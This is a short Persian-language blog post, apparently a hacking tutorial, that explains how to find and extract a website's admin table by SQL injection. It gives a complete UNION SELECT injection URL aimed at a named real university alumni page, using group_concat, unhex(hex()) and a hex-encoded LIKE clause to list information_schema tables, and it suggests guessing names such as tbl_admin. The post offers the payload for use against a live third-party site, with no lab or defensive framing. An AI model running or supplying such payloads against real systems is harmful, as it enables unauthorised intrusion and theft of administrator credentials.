به نام خدا

خوب دوستان زمانی که می خواهیم تیبل ادمین رو بیرون بکشیم ابتدا دستور group-concat رو به تنهای بکار می بریم اگر تیبل ادمین پیدا نشد ما از دستور unhex(hex()) استقاده می کنیم و اگر باز هم تیبل ادمین به نمایش در نیامد از دستور like به صورت زیر استفاده می کنیم.

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from

+information_schema.tables+where+table_name+like+0x6d656d62657273--+

 

 

خوب در اینجا ما چند تا اسم رو تست می کنیم با دستور لایک .

ابتدا ما تیبلی به اسم member رو هگز کرده و تست می کنیم اگر جواب داد که هیچ در اینصورت تیبل های دیگری مانند tbl_admin  و یا user و ...

این دستور لایک در واقع تیری در تاریکی است که در بعضی موارد جواب می دهد .

نوشته شده در تاریخ چهارشنبه 28 بهمن 1394    | توسط: No Name    | طبقه بندی: امنیت و تست نفوذ در سایت،     |
نظرات()